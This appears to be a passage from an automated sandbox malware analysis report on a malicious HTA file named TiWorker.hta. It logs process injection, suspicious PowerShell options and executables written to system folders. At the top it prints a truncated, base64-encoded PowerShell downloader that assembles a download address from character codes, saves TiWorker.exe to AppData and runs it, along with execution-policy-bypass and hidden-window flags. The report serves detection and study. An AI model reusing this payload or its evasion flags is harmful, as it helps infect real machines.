gAAkAWwBjAEgAQQBSAF0AIAAJADQAOQAgAAkAIAAJACsAIAAJAFsAYwBIAGEAUgBdACAACQA1ADYAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANQAwACAACQAgAAkAKwAgAAkAWwBjAGgAQQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQA0ADkAIAAJACAACQArACAACQBbAGMASABhAHIAXQAgAAkANQA0ACAACQAgAAkAKwAgAAkAWwBDAEgAYQByAF0AIAAJADQANgAgAAkAIAAJACsAIAAJAFsAYwBoAGEAcgBdACAACQA1ADAAIAAJACAACQArACAACQBbAGMAaABBAFIAXQAgAAkANQAxACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAQwBoAEEAcgBdACAACQA4ADMAIAAJACAACQArACAACQBbAEMAaABhAHIAXQAgAAkANAA5ACAACQAgAAkAKwAgAAkAWwBjAGgAQQBSAF0AIAAJADUANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAcgBdACAACQA1ADcAIAAJACAACQArACAACQBbAEMAaABBAFIAXQAgAAkANwA3ACAACQAgAAkAKwAgAAkAWwBjAEgAQQBSAF0AIAAJADQANwAgAAkAIAAJACsAIAAJAFsAYwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAGEAUgBdACAACQAxADAAOQAgAAkAIAAJACsAIAAJAFsAQwBIAEEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAQwBIAGEAcgBdACAACQAxADEANQAgAAkAIAAJACsAIAAJAFsAYwBoAEEAUgBdACAACQA0ADYAIAAJACAACQArACAACQBbAGMASABhAFIAXQAgAAkAMQAwADEAIAAJACAACQArACAACQBbAEMASABhAFIAXQAgAAkAMQAyADAAIAAJACAACQArACAACQBbAGMAaABhAFIAXQAgAAkAMQAwADEAIAAJACkAIAAgAAkACQAgAAkAIAAJAC0AbwB1AFQAZgBpAEwAZQAgAAkACQAJAB0gJABlAE4AdgA6AGEAcABQAEQAYQBUAEEAXABUAGkAVwBvAHIAawBlAHIALgBlAHgAZQAdICAACQAJAAkACQAJACAAIAAJAAkACQAJAAkACQAJAAkAOwAgACAAUwB0AGEAUgB0ACAACQAJAAkAIAAJAAkAIAAJAAkACQAgACAACQAJACAAHSAkAEUATgBWADoAYQBwAFAAZABhAHQAQQBcAFQAaQBXAG8AcgBrAGUAcgAuAGUAeABlAB0g "
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\TiWorker.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2260 resumed a thread in remote process 2388
NtResumeThread Sept. 19, 2023, 6:04 p.m.	thread_handle: 0x0000000000000344 suspend_count: 1 process_identifier: 2388	1	0	0

Creates a suspicious Powershell process (9 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-w hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

TiWorker.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All